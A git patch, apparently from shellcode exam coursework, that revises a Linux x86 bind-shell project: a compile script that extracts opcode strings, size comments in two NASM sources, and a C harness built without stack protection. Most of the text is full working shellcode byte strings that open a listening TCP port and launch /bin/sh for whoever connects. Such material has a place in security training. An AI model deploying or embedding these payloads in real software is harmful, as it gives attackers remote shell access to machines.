From ba6ec7ddf31a74bb5da4cc202e1306cf08b30dea Mon Sep 17 00:00:00 2001
From: arno01 <andrey.arapov@gmail.com>
Date: Sat, 9 Mar 2013 11:47:19 +0100
Subject: [PATCH] minor updates

---
 exam1/compile.sh                  |   3 ++-
 exam1/shell_bind_tcp.nasm         |   2 +-
 exam1/shell_bind_tcp_smaller.nasm |   1 +
 exam1/shellcode                   | Bin 5008 -> 4976 bytes
 exam1/shellcode.c                 |   4 ++--
 5 files changed, 6 insertions(+), 4 deletions(-)

diff --git a/exam1/compile.sh b/exam1/compile.sh
index db9cd62..1c3bcc8 100755
--- a/exam1/compile.sh
+++ b/exam1/compile.sh
@@ -1,5 +1,6 @@
 #!/usr/bin/env sh
 ARG1=$1
 set -x
-nasm -f elf32 -o $ARG1.o $ARG1.nasm && ld -m elf_i386 -o $ARG1 $ARG1.o
+nasm -f elf32 -o $ARG1.o $ARG1.nasm && ld -m elf_i386 -o $ARG1 $ARG1.o \
+&& set +x && echo "Shellcode: " && objdump -d ./$1 |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
 
diff --git a/exam1/shell_bind_tcp.nasm b/exam1/shell_bind_tcp.nasm
index b078c38..3b718ad 100644
--- a/exam1/shell_bind_tcp.nasm
+++ b/exam1/shell_bind_tcp.nasm
@@ -7,7 +7,7 @@
 ; Execs Shell on incoming connection
 ;
 ;
-;
+; Shellcode size: 141 bytes
 ; Shellcode "\x31\xc0\xb0\x66\x31\xdb\xb3\x01\x31\xc9\x51\x6a\x06\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xeb\x6d\x5f\x31\xc0\xb0\x66\x31\xdb\xb3\x02\x31\xd2\x52\x66\xff\x37\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\x31\xc0\xb0\x66\x31\xdb\xb3\x04\x6a\x01\x56\x89\xe1\xcd\x80\x31\xc0\xb0\x66\x31\xdb\xb3\x05\x31\xd2\x52\x52\x56\x89\xe1\xcd\x80\x89\xc3\x31\xc0\xb0\x3f\x31\xc9\xcd\x80\xb0\x3f\xb1\x01\xcd\x80\xb0\x3f\xb1\x02\xcd\x80\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xcd\x80\xe8\x8e\xff\xff\xff\xaa\xff"
 ;
 ; Port is the last two bytes of the shellcode. In hex \xaa\xff  (0xaaff = 43775)
diff --git a/exam1/shell_bind_tcp_smaller.nasm b/exam1/shell_bind_tcp_smaller.nasm
index ada6618..d67a77a 100644
--- a/exam1/shell_bind_tcp_smaller.nasm
+++ b/exam1/shell_bind_tcp_smaller.nasm
@@ -7,6 +7,7 @@
 ; Execs Shell on incoming connection
 ;
 ;
+; Shellcode size: 108 bytes
 ; Shellcode "\x31\xc0\xb0\x66\x31\xdb\x43\x6a\x06\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xeb\x50\x5f\x6a\x66\x58\x43\x31\xd2\x52\x66\xff\x37\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\x43\x43\x6a\x01\x56\x89\xe1\xcd\x80\xb0\x66\x43\x52\x52\x56\x89\xe1\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80\xe8\xab\xff\xff\xff\xaa\xff"
 ;
 ; Port is the last two bytes of the shellcode. In hex \xaa\xff  (0xaaff = 43775)
diff --git a/exam1/shellcode b/exam1/shellcode
index 6b3b3e3f9b8338c96a918ae2b6bdb5494e7a10ae..4bd8afd5b23be95a08bf4f86f355ccbfd87b6e05 100755
GIT binary patch
delta 318
zcmbQB{y}Ym0%OHQ#b(wej0_BGCayd$Vvzbl(`TB#+0(zriYDJWR^7BCIDK;u<2y#a
zfaxq845fCvcT8pBSQs+7gIPvA1Ss@hq;(5e1jx3$QS{;%Yry8+%-YQ9&RJ|(j9E;b
z56?Dq9(x@SpOqHjY<MXs?Z0_iaOcA;fxs}3)P^)?=PX7TGbjkmnw-THxxxNygJ<PW
z!vg^sdHTf}8T$H3nVpXVIv)WwZ{R-L@M87<|NmG0XV{#}{-1?$!sJ{Yc~+1U113-8
zQD+R8yc0;)OnwL?H70ZNsxwAxHsoE+2$Z<XmoErX2=p-nBZDME6p#+t9LsOa$e25M
jqCmGI*rPx}0fvwNUjbD`02KqdVE%g`KVY-1U@#K^`|5Vx

delta 351
zcmeyMHbH%Y0^^K{ip{J?7#SGOOk8<hWZ~h-593##VEG{(!LE5xckAP??P{BQ7~e7S
z6-;O0U?{cQy<;j1$HJ1y9n3P~B|xG7BCT7%B0#p~jiMLFSPM4qX4Yn|-^^%uGBArR
zi!qC-^WoWs&SS50;|&jNNHe^>naS`{P}+a<wBXK%SptD!AZe%!OBN$Cmldcm2rSTf
z7^uSD@Z{Ns4fY!u!6Xw{7dKEzMxK6gMuxtAQfBAlAfTZ^osZ6PG`#5h|NlSBrOm$V
z|5+F}O!noGX9fA8U~(akI%C1)nLu*R<by!cWAaNNS+QA=cQqqWVlQ95AV?uFNEjFy
xBpITBbjfC0eq%<)zR86G-HPCl0165)eEk0ksHy^}7{~?l-vjvtn`H%qnE<F!iEsb_

diff --git a/exam1/shellcode.c b/exam1/shellcode.c
index 107ea4d..cd2a158 100644
--- a/exam1/shellcode.c
+++ b/exam1/shellcode.c
@@ -9,8 +9,8 @@ gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
 #include <string.h>
 
 unsigned char code[] = \
-//"\x31\xc0\xb0\x66\x31\xdb\x43\x6a\x06\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\x6a\x66\x58\x43\x31\xd2\x52\x66\x68\x30\x39\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\x43\x43\x6a\x01\x56\x89\xe1\xcd\x80\xb0\x66\x43\x52\x52\x56\x89\xe1\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";
-"\x31\xc0\xb0\x66\x31\xdb\xb3\x01\x31\xc9\x51\x6a\x06\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xeb\x6d\x5f\x31\xc0\xb0\x66\x31\xdb\xb3\x02\x31\xd2\x52\x66\xff\x37\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\x31\xc0\xb0\x66\x31\xdb\xb3\x04\x6a\x01\x56\x89\xe1\xcd\x80\x31\xc0\xb0\x66\x31\xdb\xb3\x05\x31\xd2\x52\x52\x56\x89\xe1\xcd\x80\x89\xc3\x31\xc0\xb0\x3f\x31\xc9\xcd\x80\xb0\x3f\xb1\x01\xcd\x80\xb0\x3f\xb1\x02\xcd\x80\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xcd\x80\xe8\x8e\xff\xff\xff\x04\xd2";
+//"\x31\xc0\xb0\x66\x31\xdb\xb3\x01\x31\xc9\x51\x6a\x06\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xeb\x6d\x5f\x31\xc0\xb0\x66\x31\xdb\xb3\x02\x31\xd2\x52\x66\xff\x37\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\x31\xc0\xb0\x66\x31\xdb\xb3\x04\x6a\x01\x56\x89\xe1\xcd\x80\x31\xc0\xb0\x66\x31\xdb\xb3\x05\x31\xd2\x52\x52\x56\x89\xe1\xcd\x80\x89\xc3\x31\xc0\xb0\x3f\x31\xc9\xcd\x80\xb0\x3f\xb1\x01\xcd\x80\xb0\x3f\xb1\x02\xcd\x80\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xcd\x80\xe8\x8e\xff\xff\xff\xaa\xff";
+"\x31\xc0\xb0\x66\x31\xdb\x43\x6a\x06\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xeb\x50\x5f\x6a\x66\x58\x43\x31\xd2\x52\x66\xff\x37\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\x43\x43\x6a\x01\x56\x89\xe1\xcd\x80\xb0\x66\x43\x52\x52\x56\x89\xe1\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80\xe8\xab\xff\xff\xff\xaa\xff";
 
 main()
 {